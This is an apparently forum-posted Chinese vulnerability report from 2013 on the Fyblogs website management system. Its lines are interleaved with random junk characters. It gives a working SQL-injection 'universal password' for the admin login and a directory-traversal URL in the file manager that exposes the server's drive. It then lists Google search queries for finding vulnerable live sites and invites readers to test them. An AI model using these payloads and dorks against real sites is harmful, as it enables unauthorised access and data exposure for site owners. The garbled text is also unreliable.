漏洞类型: 未授权访问/权限绕过5 p6 l+ y0 ]5 o0 d/ z. ]- X4 {9 u
- A H& k: X7 y: |
简要描述:
. T' q& @" p0 t) b1 [' q; ~: g0 b( x+ V: q3 C! s
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!: H" L9 W0 O. `9 m
: ~2 c2 `; C, e0 r8 {1 L: I' A" r详细说明:
, k6 G2 B* l+ \. {$ M b: `( }- C. }6 o' E
后台万能密码 'or'='or') c: N7 {/ ?% ]$ m
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
" `9 V( p' ~4 d+ m/ [- aadmin/uploadfile.asp?currentFolder=/upfiles/../; d' U( g/ z- T; w* A3 }- h
# B- J! x# N; S- }1 N t漏洞证明:
& p% r4 _" r3 k& P) U1 F
# L, U; n+ ]) [% X5 C1 N/ e谷歌:inurl:type.asp?id=1 新闻中心
9 o( a4 h& d9 \$ q2 e9 ~$ g5 L或者 :inurl:download_ok.asp?* m# `% C+ L; `& m) x2 w
6 g$ I3 ]$ L+ _$ d可以测试, y+ c4 N5 u; m/ X; \% m
: \2 I: J+ K, B( ^
* }2 @ j+ H9 \+ q3 T6 i- q |
发表于 2013-3-7 13:07:46
收藏
支持
反对